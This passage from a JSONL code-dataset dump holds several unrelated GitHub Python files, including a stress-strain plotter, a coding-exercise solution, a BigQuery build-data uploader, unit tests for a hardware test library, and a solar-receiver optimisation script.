float(values[1])\r\n\r\n\r\nforca = int(values[2])\r\ncomprimento_Instantaneo = float(values[3])\r\ndiametro_Instantaneo = float(values[4])\r\n\r\n\r\ntensao_De_Engenharia = forca / ((diametro_Inicial / 2) ** 2) * 3.14\r\ndeformacao_De_Engenharia = (comprimento_Instantaneo - comprimento_Inicial) / comprimento_Inicial\r\ntensao_Verdadeira = forca / ((diametro_Instantaneo / 2) ** 2) * 3.14\r\ndeformacao_Verdadeira = math.log(comprimento_Instantaneo / comprimento_Inicial)\r\n\r\nsg.popup('Valores Calculados',\r\n 'Tensão de Engenharia',tensao_De_Engenharia,\r\n 'Deformação de Engenharia', deformacao_De_Engenharia,\r\n 'Tensão Verdadeira', tensao_Verdadeira,\r\n 'Deformação Verdadeira', deformacao_Verdadeira,\r\n\r\n 'CLIQUE EM OK PARA GERAR O GRÁFICO',\r\n title=\"Valores Claculados\")\r\n\r\n\r\nengenharia = [deformacao_De_Engenharia, tensao_Verdadeira]\r\nreal = [deformacao_Verdadeira, tensao_De_Engenharia]\r\n\r\nplot(engenharia, marker=\"o\")\r\nplot(real, marker=\"o\")\r\n\r\ntitle('Tensão vs Deformação')\r\n\r\nxlabel('Deformação')\r\nylabel('Tensão (MPa)')\r\nlegend(['Engenharia','Real'])\r\n\r\naxis(ymin=0,ymax=570000)\r\naxis(xmin=0, xmax=2)\r\n\r\nplt.grid()\r\nshow()\r\n\r\n\r\n","repo_name":"allefbcc/Codigos-em-Python","sub_path":"pythonProject/grafico.py","file_name":"grafico.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13097094725","text":"from sys import stdin\nimport heapq\n\n\ndef solution(users):\n users.sort()\n counter = {}\n heap = []\n seats = [1]\n for s, e in users:\n while heap and heap[0][0] < s:\n heapq.heappush(seats, heapq.heappop(heap)[1])\n if seats:\n seat = heapq.heappop(seats)\n else:\n seat = len(heap) + 1\n heapq.heappush(heap, (e, seat))\n counter[seat] = counter.get(seat, 0) + 1\n\n print(max(counter))\n print(' '.join(map(lambda x: str(x[1]), sorted(counter.items()))))\n\nN = int(stdin.readline())\nusers = [list(map(int, stdin.readline().strip().split(' '))) for _ in range(N)]\n\nsolution(users)","repo_name":"grasshopperTrainer/coding_practice","sub_path":"baekjoon/accepted/12764 싸지방에 간 준하.py","file_name":"12764 싸지방에 간 준하.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"12507783145","text":"import collections\nimport logging\nimport re\nimport time\n\nfrom google.appengine.api import urlfetch\nimport webapp2\n\nfrom base import bigquery\nfrom base import constants\nfrom common import buildbot\n\n\nclass Builds(webapp2.RequestHandler):\n\n def get(self):\n urlfetch.set_default_fetch_deadline(300)\n\n bq = bigquery.BigQuery()\n\n current_events = []\n events = []\n for master_name in constants.MASTER_NAMES:\n builders = buildbot.Builders(master_name)\n available_builds = _AvailableBuilds(builders)\n recorded_builds = _RecordedBuilds(bq, builders, available_builds)\n for builder in builders:\n # Filter out recorded builds from available builds.\n build_numbers = (available_builds[builder.name] -\n recorded_builds[builder.name])\n builder_current_events, builder_events = _TraceEventsForBuilder(\n builder, build_numbers)\n current_events += builder_current_events\n events += builder_events\n\n jobs = []\n if current_events:\n jobs += bq.InsertRowsAsync(\n constants.DATASET, constants.CURRENT_BUILDS_TABLE,\n current_events, truncate=True)\n if events:\n jobs += bq.InsertRowsAsync(constants.DATASET, constants.BUILDS_TABLE,\n events)\n\n for job in jobs:\n bq.PollJob(job, 60 * 20) # 20 minutes.\n\n\ndef _AvailableBuilds(builders):\n available_builds = {}\n for builder in builders:\n if not builder.cached_builds:\n available_builds[builder.name] = frozenset()\n continue\n\n max_build = max(builder.cached_builds)\n # Buildbot on tryserver.chromium.perf is occasionally including build 0 in\n # its list of cached builds. That results in more builds than we want.\n # Limit the list to the last 100 builds, because the urlfetch URL limit is\n # 2048 bytes, and \"&select=100000\" * 100 is 1400 bytes.\n builds = frozenset(build for build in builder.cached_builds\n if build >= max_build - 100)\n available_builds[builder.name] = builds\n return available_builds\n\n\ndef _RecordedBuilds(bq, builders, available_builds):\n # 105 days / 15 weeks. Must be some number greater than 100 days, because\n # we request up to 100 builds (see above comment), and the slowest cron bots\n # run one job every day.\n start_time_ms = -1000 * 60 * 60 * 24 * 105\n table = '%s.%s@%d-' % (constants.DATASET, constants.BUILDS_TABLE,\n start_time_ms)\n\n conditions = []\n for builder in builders:\n if not available_builds[builder.name]:\n continue\n max_build = max(available_builds[builder.name])\n min_build = min(available_builds[builder.name])\n conditions.append('WHEN builder = \"%s\" THEN build >= %d AND build <= %d' %\n (builder.name, min_build, max_build))\n\n query = (\n 'SELECT builder, build '\n 'FROM [%s] ' % table +\n 'WHERE CASE %s END ' % ' '.join(conditions) +\n 'GROUP BY builder, build'\n )\n query_result = bq.QuerySync(query, 600)\n\n builds = collections.defaultdict(set)\n for row in query_result:\n builds[row['f'][0]['v']].add(int(row['f'][1]['v']))\n return builds\n\n\ndef _TraceEventsForBuilder(builder, build_numbers):\n if not build_numbers:\n return (), ()\n\n build_numbers_string = ', '.join(map(str, sorted(build_numbers)))\n logging.info('Getting %s: %s', builder.name, build_numbers_string)\n\n # Fetch build information and generate trace events.\n current_events = []\n events = []\n\n builder_builds = builder.builds.Fetch(build_numbers)\n query_time = time.time()\n for build in builder_builds:\n if build.complete:\n events += _TraceEventsFromBuild(builder, build, query_time)\n else:\n current_events += _TraceEventsFromBuild(builder, build, query_time)\n\n return current_events, events\n\n\ndef _TraceEventsFromBuild(builder, build, query_time):\n match = re.match(r'(.+) \\(([0-9]+)\\)', builder.name)\n if match:\n configuration, host_shard = match.groups()\n host_shard = int(host_shard)\n else:\n configuration = builder.name\n host_shard = 0\n\n # Build trace event.\n if build.end_time:\n build_end_time = build.end_time\n else:\n build_end_time = query_time\n os, os_version, role = _ParseBuilderName(builder.name)\n yield {\n 'name': 'Build %d' % build.number,\n 'start_time': build.start_time,\n 'end_time': build_end_time,\n\n 'build': build.number,\n 'builder': builder.name,\n 'configuration': configuration,\n 'host_shard': host_shard,\n 'hostname': build.slave_name,\n 'master': builder.master_name,\n 'os': os,\n 'os_version': os_version,\n 'role': role,\n 'status': build.status,\n 'url': build.url,\n }\n\n # Step trace events.\n for step in build.steps:\n if not step.start_time:\n continue\n\n if step.name == 'steps':\n continue\n\n if step.end_time:\n step_end_time = step.end_time\n else:\n step_end_time = query_time\n yield {\n 'name': step.name,\n 'start_time': step.start_time,\n 'end_time': step_end_time,\n\n 'benchmark': step.name, # TODO(dtu): This isn't always right.\n 'build': build.number,\n 'builder': builder.name,\n 'configuration': configuration,\n 'host_shard': host_shard,\n 'hostname': build.slave_name,\n 'master': builder.master_name,\n 'os': os,\n 'os_version': os_version,\n 'role': role,\n 'status': step.status,\n 'url': step.url,\n }\n\n\ndef _ParseBuilderName(builder_name):\n builder_name = builder_name.lower()\n\n for os in ('android', 'linux', 'mac', 'win'):\n if os in builder_name:\n break\n else:\n os = None\n\n if 'build' in builder_name or 'compile' in builder_name:\n role = 'builder'\n else:\n role = 'tester'\n\n return (os, None, role)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/catapult/firefighter/update/handlers/builds.py","file_name":"builds.py","file_ext":"py","file_size_in_byte":5788,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"38774492501","text":"import random\nfrom hwtypes import BitVector\nimport fault\nfrom fault.actions import Poke, Expect, Eval, Step, Print\nfrom fault.array import Array\nfrom fault.vector_builder import VectorBuilder\nfrom .common import (TestBasicCircuit, TestBasicClkCircuit,\n TestNestedArraysCircuit)\n\n\ndef test_tester_basic():\n circ = TestBasicCircuit\n builder = VectorBuilder(circ)\n builder.process(Poke(circ.I, BitVector[1](0)))\n builder.process(Expect(circ.O, BitVector[1](0)))\n assert builder.vectors == [[BitVector[1](0), BitVector[1](0)]]\n builder.process(Eval())\n assert builder.vectors == [[BitVector[1](0), BitVector[1](0)],\n [BitVector[1](0), fault.AnyValue]]\n\n\ndef test_tester_clock():\n circ = TestBasicClkCircuit\n builder = VectorBuilder(circ)\n builder.process(Poke(circ.I, BitVector[1](0)))\n builder.process(Print(\"%x\", circ.O))\n builder.process(Expect(circ.O, BitVector[1](0)))\n assert builder.vectors == [\n [BitVector[1](0), BitVector[1](0), fault.AnyValue]\n ]\n builder.process(Poke(circ.CLK, BitVector[1](0)))\n assert builder.vectors == [\n [BitVector[1](0), BitVector[1](0), BitVector[1](0)]\n ]\n builder.process(Step(circ.CLK, 1))\n assert builder.vectors == [\n [BitVector[1](0), BitVector[1](0), BitVector[1](0)],\n [BitVector[1](0), fault.AnyValue, BitVector[1](1)]\n ]\n\n\ndef test_tester_nested_arrays():\n circ = TestNestedArraysCircuit\n builder = VectorBuilder(circ)\n expected = []\n for i in range(3):\n val = random.randint(0, (1 << 4) - 1)\n builder.process(Poke(circ.I[i], BitVector[4](val)))\n builder.process(Expect(circ.O[i], BitVector[4](val)))\n expected.append(val)\n assert builder.vectors == [[Array(expected, 3), Array(expected, 3)]]\n","repo_name":"leonardt/fault","sub_path":"tests/test_vector_builder.py","file_name":"test_vector_builder.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"52"} +{"seq_id":"1269511823","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 15 20:00:57 2020\r\n\r\n@author: z5158936\r\n\"\"\"\r\nif __name__ == '__main__':\r\n __spec__ = None\r\n \r\n import pandas as pd\r\n import numpy as np\r\n from scipy.optimize import fsolve\r\n import matplotlib.pyplot as plt\r\n from matplotlib import cm\r\n import matplotlib.patches as patches\r\n from importlib import reload\r\n import gc\r\n import BDR\r\n # BDR = reload(BDR)\r\n \r\n def A_rqrd(rO,*args):\r\n #This function is to calculate the required area given some\r\n A_rcv_rq,Dsgn_CPC,xrc,yrc,zrc,Cg = args\r\n N_CPC, V_CPC = BDR.CPC_Design(Dsgn_CPC)\r\n CPC = BDR.CPC_Params( Dsgn_CPC, xrc,yrc,zrc, {'rO':rO,'Cg':Cg} )\r\n A_rcv = CPC['A_rcv']\r\n return A_rcv - A_rcv_rq\r\n \r\n ################################################\r\n ################ MAIN PROGRAM ##################\r\n ################################################\r\n \r\n # Operational Modes:\r\n # 1 #Testing one single value\r\n # 2 #Testing different heights, fzvs and powers\r\n # 3 #Testing different designs and concentration ratio\r\n \r\n op_mode = 1\r\n \r\n if op_mode == 1:\r\n zfs = [50]\r\n fzvs = [0.83]\r\n Cgs = [2.]\r\n Dsgns = ['A']\r\n Pels = [10.]\r\n \r\n fldr_rslt = 'BDR_OptimCase'\r\n fldr_rslt = 'Paper_Results'\r\n file_rslt = ''\r\n write_f = False\r\n plot = False\r\n \r\n if op_mode == 2:\r\n zfs = [50,]\r\n # fzvs = np.arange(0.812,0.851,0.002)\r\n fzvs = np.arange(0.770,0.810,0.002)\r\n Cgs = [2.]\r\n Dsgns = ['A']\r\n Pels = [5,4,3,2]\r\n \r\n fldr_rslt = 'BDR_OptimCase'\r\n file_rslt = fldr_rslt+'/1-Pvar_final.txt'\r\n write_f = True\r\n plot = False\r\n \r\n if op_mode == 3:\r\n zfs = [50]\r\n fzvs = np.arange(0.75,0.85,0.02)\r\n Cgs = [3.0,4.0]\r\n Dsgns = ['A']\r\n Pels = [10]\r\n plot = True\r\n \r\n fldr_rslt = 'BDR_OptimCase'\r\n file_rslt = fldr_rslt+'/1-CPC_final.txt'\r\n write_f = True\r\n \r\n ############################################\r\n fldr_dat = 'Datasets_Final'\r\n txt_header = 'Pel\\tzf\\tfzv\\tCg\\tDsgn\\teta_hbi\\teta_cos\\teta_blk\\teta_att\\teta_hbi\\teta_cpi\\teta_cpr\\teta_CPC\\teta_BDR\\teta_SF\\tQ_acc\\tN_hel\\tS_hel\\tS_HB\\tS_CPC\\tH_CPC\\trO\\tQ_max\\tstatus\\n'\r\n # if write_f: f = open(file_rslt,'w'); f.write(txt_header); f.close()\r\n \r\n ########### Running the loop ###############\r\n for (zf,fzv,Cg,Dsgn_CPC,Pel) in [(zf,fzv,Cg,Dsgn_CPC,Pel) for zf in zfs for fzv in fzvs for Cg in Cgs for Dsgn_CPC in Dsgns for Pel in Pels]:\r\n \r\n case = 'zf_{:d}_fzv_{:.3f}_Cg_{:.1f}_Dsgn_{}_Pel_{:.1f}'.format(zf,fzv,Cg,Dsgn_CPC,Pel)\r\n print(case)\r\n\r\n #Defining the conditions for the plant\r\n CST = BDR.CST_BaseCase(zf=zf,fzv=fzv,P_el=Pel)\r\n \r\n #Files for initial data set and HB intersections dataset\r\n file_SF = fldr_dat+'/Rays_Data_height_{:.0f}'.format(zf)\r\n file_HB = fldr_dat+'/Basecase_zf{:.0f}_fzv{:.3f}_R1'.format(CST['zf'],CST['fzv'])\r\n \r\n #Getting the receiver area and the characteristics for CPC\r\n A_rcv_rq = CST['P_th'] / CST['Q_av'] #Area receiver\r\n rO = fsolve(A_rqrd, 1.0, args=(A_rcv_rq,Dsgn_CPC,CST['xrc'],CST['yrc'],CST['zrc'],Cg))[0]\r\n CPC = BDR.CPC_Params( Dsgn_CPC, CST['xrc'],CST['yrc'],CST['zrc'], {'rO':rO,'Cg':Cg} )\r\n \r\n \r\n ### Calling the optimisation function\r\n ######################################################################\r\n ######################################################################\r\n \r\n R2, Etas, SF, CPC, HB, hlst, Q_rcv, status = BDR.Optimisation(CST,CPC,file_SF,file_HB)\r\n \r\n ######################################################################\r\n ######################################################################\r\n \r\n #Some postcalculations\r\n S_CPC,H_CPC,rO = [ CPC[x] for x in ['S_CPC','H','rO'] ]\r\n N_hel = len(hlst)\r\n S_hel = N_hel * CST['A_h1']\r\n Pel_real = SF.loc[hlst]['Q_acc'].max() * (CST['eta_pb']*CST['eta_sg']*CST['eta_rc'])\r\n \r\n #Printing the result on file\r\n text_r = '\\t'.join('{:.3f}'.format(x) for x in [Pel,zf, fzv, Cg])\r\n text_r = text_r + '\\t'+Dsgn_CPC+'\\t'+ '\\t'.join('{:.4f}'.format(x) for x in [CST['eta_hbi'], Etas['Eta_cos'], Etas['Eta_blk'], Etas['Eta_att'], Etas['Eta_hbi'], Etas['Eta_cpi'], Etas['Eta_cpr'], Etas['Eta_CPC'], Etas['Eta_BDR'], Etas['Eta_SF']])+'\\t'\r\n text_r = text_r + '\\t'.join('{:.2f}'.format(x) for x in [ Pel_real, N_hel, S_hel, HB['S_HB'], S_CPC,H_CPC,rO,Q_rcv.max()])+'\\t'+status+'\\n'\r\n print(text_r[:-2])\r\n \r\n if write_f: f = open(file_rslt,'a'); f.write(text_r); f.close()\r\n \r\n # R2.to_pickle('R2_basecase.plk')\r\n # np.save('Q_rcv',Q_rcv) \r\n #####################################################################\r\n #####################################################################\r\n ############################ PLOTING ################################\r\n #####################################################################\r\n #####################################################################\r\n \r\n if plot:\r\n \r\n N_CPC,V_CPC,rO,rA,Cg = [ CPC[x] for x in ['N','V','rO','rA','Cg'] ] \r\n xrc, yrc, zrc = [CST[x] for x in ['xrc','yrc','zrc']]\r\n x0,y0 = BDR.CPC_Centers(Dsgn_CPC,rA,xrc,yrc)\r\n xCA, yCA, xCO, yCO = [],[],[],[]\r\n for i in range(N_CPC):\r\n xA,yA = BDR.CPC_XY_R(rA,H_CPC,V_CPC,N_CPC,x0[i],y0[i],zrc)\r\n xO,yO = BDR.CPC_XY_R(rO,H_CPC,V_CPC,N_CPC,x0[i],y0[i],zrc) \r\n xCA.append(xA);xCO.append(xO);yCA.append(yA);yCO.append(yO);\r\n xCA=np.array(xCA);xCO=np.array(xCO);yCA=np.array(yCA);yCO=np.array(yCO)\r\n xmin,xmax,ymin,ymax = xCA.min(), xCA.max(), yCA.min(), yCA.max()\r\n \r\n \r\n ###### Ploting CPC shape\r\n Nx = 100; Ny = 100\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Ny\r\n dA = dx*dy\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Nx; dA=dx*dy\r\n \r\n fig = plt.figure(figsize=(10,10))\r\n # plt.scatter(R2['xr'],R2['yr'],c='b',s=0.01)\r\n for N in range(N_CPC):\r\n plt.plot(xCA[N],yCA[N],c='k')\r\n plt.plot(xCO[N],yCO[N],c='k')\r\n plt.grid()\r\n plt.xlim(xmin,xmax);plt.ylim(ymin,ymax);\r\n fig.savefig(fldr_rslt+'/'+case+'_shape.png', bbox_inches='tight')\r\n plt.close()\r\n \r\n ###### Ploting CPC efficiency points\r\n fig = plt.figure(figsize=(10,10))\r\n ax = fig.add_subplot(111, aspect='equal')\r\n ax.scatter(R2[(R2['hit_cpc']==0)]['xc'], R2[(R2['hit_cpc']==0)]['yc'],s=0.1)\r\n ax.scatter(R2[(R2['hit_cpc']>0)&(~R2['hit_rcv'])]['xc'], R2[(R2['hit_cpc']>0)&(~R2['hit_rcv'])]['yc'],s=0.1,c='gray')\r\n for N in range(N_CPC):\r\n ax.plot(xCA[N],yCA[N],c='k')\r\n ax.plot(xCO[N],yCO[N],c='k')\r\n ax.grid()\r\n ax.set_xlim(xmin,xmax);ax.set_ylim(ymin,ymax);\r\n \r\n ax.annotate(r'$\\eta_{{cpo}}={:.2f}$'.format(Etas['Eta_cpr']),(-2.5,-2.5),fontsize=18, backgroundcolor='white')\r\n ax.annotate(r'$\\eta_{{cpi}}={:.2f}$'.format(Etas['Eta_cpi']),(4.,-5.8),fontsize=18, backgroundcolor='white')\r\n \r\n ax.annotate('Design A:',(1.05,0.29),xycoords='axes fraction', fontsize=18)\r\n ax.annotate('3-hexagon',(1.05,0.26),xycoords='axes fraction', fontsize=18)\r\n ax.annotate(r'$z_{{f}}={:.1f}m$'.format(zf),(1.05,0.20),xycoords='axes fraction', fontsize=18)\r\n ax.annotate(r'$f_{{v}}={:.2f}$'.format(fzv),(1.05,0.16),xycoords='axes fraction', fontsize=18)\r\n ax.annotate(r'$P_{{el}}={:.1f}MW_e$'.format(Pel),(1.03,0.12),xycoords='axes fraction', fontsize=18)\r\n ax.annotate(r'$C_{{CPC}}={:.1f}$'.format(Cg),(1.05,0.08),xycoords='axes fraction', fontsize=18)\r\n \r\n \r\n kw0 = dict(arrowstyle=\"Simple, tail_width=2.0, head_width=6, head_length=10\", color=\"k\")\r\n ax.add_patch(patches.FancyArrowPatch((-1.5, -2), (-1.0, -0.5), connectionstyle=\"arc3,rad=-0.2\", zorder=10, **kw0))\r\n ax.add_patch(patches.FancyArrowPatch((3.9, -5.8), (2.5, -4.5), connectionstyle=\"arc3,rad=-0.2\", zorder=10, **kw0))\r\n \r\n plt.show()\r\n fig.savefig(fldr_rslt+'/'+case+'_no_hitting.png', bbox_inches='tight')\r\n plt.close()\r\n \r\n break\r\n \r\n #####################################################\r\n ######## HYPERBOLOID RADIATION MAP ##################\r\n \r\n f_s = 18\r\n out2 = R2[(R2['hel_in'])&(R2['hit_hb'])]\r\n xmin = out2['xb'].min(); xmax = out2['xb'].max()\r\n ymin = out2['yb'].min(); ymax = out2['yb'].max()\r\n Nx = 100; Ny = 100\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Nx; dA=dx*dy\r\n Fbin = CST['eta_rfl']*Etas['Eta_cos']*Etas['Eta_blk']*(CST['Gbn']*CST['A_h1']*N_hel)/(1e3*dA*len(out2))\r\n Q_HB,X,Y = np.histogram2d(out2['xb'],out2['yb'],bins=[Nx,Ny],range=[[xmin, xmax], [ymin, ymax]],density=False)\r\n fig = plt.figure(figsize=(12, 12))\r\n # ax = fig.add_subplot(111, title='Ray density on hyperboloid surface (upper view)', aspect='equal')\r\n ax = fig.add_subplot(111, aspect='equal')\r\n X, Y = np.meshgrid(X, Y)\r\n \r\n vmin = 0\r\n vmax = (np.ceil(Fbin*Q_HB.max()/10)*10)\r\n surf = ax.pcolormesh(X, Y, Fbin*Q_HB.transpose(),cmap=cm.YlOrRd,vmin=vmin,vmax=vmax)\r\n ax.set_xlabel('E-W axis (m)',fontsize=f_s);ax.set_ylabel('N-S axis (m)',fontsize=f_s);\r\n cb = fig.colorbar(surf, shrink=0.25, aspect=4)\r\n cb.ax.tick_params(labelsize=f_s)\r\n fig.text(0.77,0.62,r'$Q_{HB}(kW/m^2)$',fontsize=f_s)\r\n for tick in ax.xaxis.get_major_ticks(): tick.label.set_fontsize(f_s)\r\n for tick in ax.yaxis.get_major_ticks(): tick.label.set_fontsize(f_s)\r\n \r\n # from matplotlib import rc\r\n # rc('text', usetex=True)\r\n fig.text(0.77,0.35,'Main Parameters',fontsize=f_s-3)\r\n fig.text(0.77,0.33,r'$z_{f\\;}=50 m$',fontsize=f_s-3)\r\n fig.text(0.77,0.31,r'$f_{zv}=0.83$',fontsize=f_s-3)\r\n fig.text(0.77,0.29,r'$z_{rc}=10 m$',fontsize=f_s-3)\r\n fig.text(0.77,0.27,r'$\\eta_{hbi}=0.95$',fontsize=f_s-3)\r\n \r\n r1 = patches.Circle((0.,0.0), HB['rlims'][0], zorder=10,color='black',fill=None)\r\n r2 = patches.Circle((0.,0.0), HB['rlims'][1], zorder=10,edgecolor='black',fill=None)\r\n ax.add_artist(r1)\r\n ax.add_artist(r2)\r\n ax.grid(zorder=20)\r\n # fig.savefig(fldr_rslt+'/'+case+'_QHB_upper.pdf', bbox_inches='tight')\r\n fig.savefig(fldr_rslt+'/'+case+'_QHB_upper.png', bbox_inches='tight')\r\n # plt.show()\r\n plt.close()\r\n print(Q_HB.sum())\r\n del out2\r\n \r\n #########################################################\r\n #Q BDR Distribution\r\n N_CPC,V_CPC,rO,rA,Cg = [ CPC[x] for x in ['N','V','rO','rA','Cg'] ] \r\n xrc, yrc, zrc = [CST[x] for x in ['xrc','yrc','zrc']]\r\n x0,y0 = BDR.CPC_Centers(Dsgn_CPC,rA,xrc,yrc)\r\n xCA, yCA, xCO, yCO = [],[],[],[]\r\n for i in range(N_CPC):\r\n #Plotting hexagons\r\n xA,yA = BDR.CPC_XY_R(rA,H_CPC,V_CPC,N_CPC,x0[i],y0[i],zrc)\r\n xO,yO = BDR.CPC_XY_R(rO,H_CPC,V_CPC,N_CPC,x0[i],y0[i],zrc) \r\n xCA.append(xA);xCO.append(xO);yCA.append(yA);yCO.append(yO);\r\n xCA=np.array(xCA);xCO=np.array(xCO);yCA=np.array(yCA);yCO=np.array(yCO)\r\n xmin,xmax,ymin,ymax = xCA.min(), xCA.max(), yCA.min(), yCA.max()\r\n \r\n fig = plt.figure(figsize=(14, 8))\r\n ax = fig.add_subplot(111, title='Ray density map on CPC aperture plane (upper view)', aspect='equal')\r\n for N in range(N_CPC):\r\n ax.plot(xCA[N],yCA[N],c='k')\r\n ax.plot(xCO[N],yCO[N],c='k')\r\n Q,x,y,surf = ax.hist2d(R2['xc'],R2['yc'], bins=100, range= [[xmin,xmax], [ymin,ymax]] , cmap=cm.YlOrRd)\r\n cbar = fig.colorbar(surf, shrink=0.5, aspect=4)\r\n ax.set_xlabel('X axis (m)');ax.set_ylabel('Y axis (m)');\r\n fig.savefig(fldr_rslt+'/'+case+'_radmap_ap.png', bbox_inches='tight')\r\n plt.grid()\r\n # plt.show()\r\n plt.close()\r\n \r\n ##############################################################\r\n Nx = 100; Ny = 100\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Ny\r\n dA = dx*dy\r\n dx = (xmax-xmin)/Nx; dy = (ymax-ymin)/Nx; dA=dx*dy\r\n out = R2[(R2['hel_in'])&(R2['hit_rcv'])]\r\n Nrays = len(out)\r\n Fbin = Etas['Eta_SF'] * (CST['Gbn']*CST['A_h1']*N_hel)/(1e3*dA*Nrays)\r\n Q_CPC,X,Y = np.histogram2d(out['xr'],out['yr'],bins=[Nx,Ny],range=[[xmin, xmax], [ymin, ymax]], density=False)\r\n Q_max = Fbin * Q_CPC.max()\r\n fig = plt.figure(figsize=(14, 8))\r\n ax = fig.add_subplot(111, aspect='equal')\r\n for N in range(N_CPC):\r\n ax.plot(xCA[N],yCA[N],c='k')\r\n ax.plot(xCO[N],yCO[N],c='k')\r\n X, Y = np.meshgrid(X, Y)\r\n f_s = 16\r\n vmin = 0\r\n vmax = 2000\r\n surf = ax.pcolormesh(X, Y, Fbin*Q_CPC.transpose(),cmap=cm.YlOrRd,vmin=vmin,vmax=vmax)\r\n ax.set_xlabel('E-W axis (m)',fontsize=f_s);ax.set_ylabel('N-S axis (m)',fontsize=f_s);\r\n cb = fig.colorbar(surf, shrink=0.25, aspect=4)\r\n cb.ax.tick_params(labelsize=f_s-2)\r\n fig.text(0.77,0.65,r'$Q_{{rcv}}(kW/m^2)$',fontsize=f_s)\r\n fig.savefig(fldr_rslt+'/'+case+'_radmap_out.png', bbox_inches='tight')\r\n plt.grid()\r\n plt.close()\r\n \r\n del X,Y\r\n \r\n ################## Solar Field #############################\r\n R2f = pd.merge( R2 , SF.loc[hlst] , how='inner', on=['hel'] )\r\n f_s=18\r\n fig = plt.figure(figsize=(12,8))\r\n ax1 = fig.add_subplot(111)\r\n \r\n # vmin = ((np.floor(10*R2f['Eta_SF'].min())-1)/10)\r\n # vmax = (np.ceil(10*R2f['Eta_SF'].max())/10)\r\n \r\n vmin = 0.0\r\n vmax = 1.0\r\n \r\n surf = ax1.scatter(R2f['xi'],R2f['yi'], s=0.5, c=R2f['Eta_SF'], cmap=cm.YlOrRd, vmin=vmin, vmax=vmax )\r\n cb = fig.colorbar(surf, shrink=0.25, aspect=4)\r\n cb.ax.tick_params(labelsize=f_s)\r\n cb.ax.locator_params(nbins=4)\r\n \r\n fig.text(0.76,0.70,r'$\\overline{\\eta_{{SF}}}$'+'={:.3f}'.format(Etas['Eta_SF']),fontsize=f_s)\r\n fig.text(0.76,0.65,r'$N_{{hel}}$'+'={:d}'.format(N_hel),fontsize=f_s)\r\n # plt.title(title+' (av. eff. {:.2f} %)'.format(Etas_SF[eta_type]*100))\r\n ax1.set_xlabel('E-W axis (m)',fontsize=f_s);ax1.set_ylabel('N-S axis (m)',fontsize=f_s);\r\n # ax1.set_title(r'Focal point height: {:.0f}m ($\\eta_{{avg}}$={:.2f})'.format(zf,Eta_cos.mean()),fontsize=f_s)\r\n # ax1.set_title('No eta_cpi',fontsize=f_s)\r\n for tick in ax1.xaxis.get_major_ticks(): tick.label.set_fontsize(f_s)\r\n for tick in ax1.yaxis.get_major_ticks(): tick.label.set_fontsize(f_s)\r\n ax1.grid()\r\n fig.savefig(fldr_rslt+'/'+case+'_SF.png', bbox_inches='tight')\r\n # fig.savefig(fldr_rslt+'/'+case+'_SF.pdf', bbox_inches='tight')\r\n # plt.show()\r\n plt.close(fig)\r\n del R2f, out\r\n \r\n # break\r\n del R2, SF, Etas, CST, CPC, HB, hlst\r\n gc.collect()\r\n # break\r\n","repo_name":"DavidSaldivia/BDR_MCRT","sub_path":"2_OpticalAnalysis_old/0-BDR_OptimFinal.py","file_name":"0-BDR_OptimFinal.py","file_ext":"py","file_size_in_byte":16347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32112836709","text":"def next_position(r, c, command):\n if command == \"right\":\n return r, c + 1\n elif command == \"left\":\n return r, c - 1\n elif command == \"up\":\n return r - 1, c\n elif command == \"down\":\n return r + 1, c\n\n\ndef get_children(r, c):\n children = [\n [r - 1, c],\n [r + 1, c],\n [r, c + 1],\n [r, c - 1]\n ]\n return children\n\n\npresents = int(input())\nsize = int(input())\n\nneighbourhood = []\nsanta_row = 0\nsanta_col = 0\nnice_kids = 0\n\nfor row in range(size):\n row_elements = input().split()\n for col in range(size):\n if row_elements[col] == \"S\":\n santa_row = row\n santa_col = col\n elif row_elements[col] == \"V\":\n nice_kids += 1\n\n neighbourhood.append(row_elements)\n\ncounter_kids = 0\nwhile True:\n command = input()\n if command == \"Christmas morning\":\n break\n neighbourhood[santa_row][santa_col] = \"-\"\n santa_row, santa_col = next_position(santa_row, santa_col, command)\n\n if neighbourhood[santa_row][santa_col] == \"V\":\n presents -= 1\n counter_kids += 1\n elif neighbourhood[santa_row][santa_col] == \"C\":\n presents_delivery = get_children(santa_row, santa_col)\n for cookie_row, cookie_col in presents_delivery:\n if neighbourhood[cookie_row][cookie_col] != \"-\":\n presents -= 1\n if neighbourhood[cookie_row][cookie_col] == \"V\":\n counter_kids += 1\n neighbourhood[cookie_row][cookie_col] = \"-\"\n\n neighbourhood[santa_row][santa_col] = \"S\"\n if presents == 0:\n break\n\nif presents <= 0 and (nice_kids - counter_kids) > 0:\n print(\"Santa ran out of presents!\")\n\nfor row in neighbourhood:\n print(*row, sep=\" \")\n\nif nice_kids - counter_kids > 0:\n print(f\"No presents for {nice_kids - counter_kids} nice kid/s.\")\nelse:\n print(f\"Good job, Santa! {nice_kids} happy nice kid/s.\")","repo_name":"pepapopova/SoftUni-Courses","sub_path":"Python advanced/multidimensional_lists/exer_two/present_delivery.py","file_name":"present_delivery.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21936776350","text":"\"\"\"\nDefines classes for parsing and compiling box declarations, which consist of a\nname followed by an attribute list in square brackets. Box declarations must\noccupy a single line and must not contain arrows (`->`)::\n\n []\n\"\"\"\n\nimport re\n\nfrom fbrelation.utility import find\n\nfrom fbrelation.exceptions import ParsingError, CompilationError\n\nfrom fbrelation.syntax.attributelist import AttributeListSyntax\n\nfrom fbrelation.declarations.box import FunctionBoxDeclaration, \\\n MacroInputBoxDeclaration, \\\n MacroOutputBoxDeclaration, \\\n MacroBoxDeclaration, \\\n 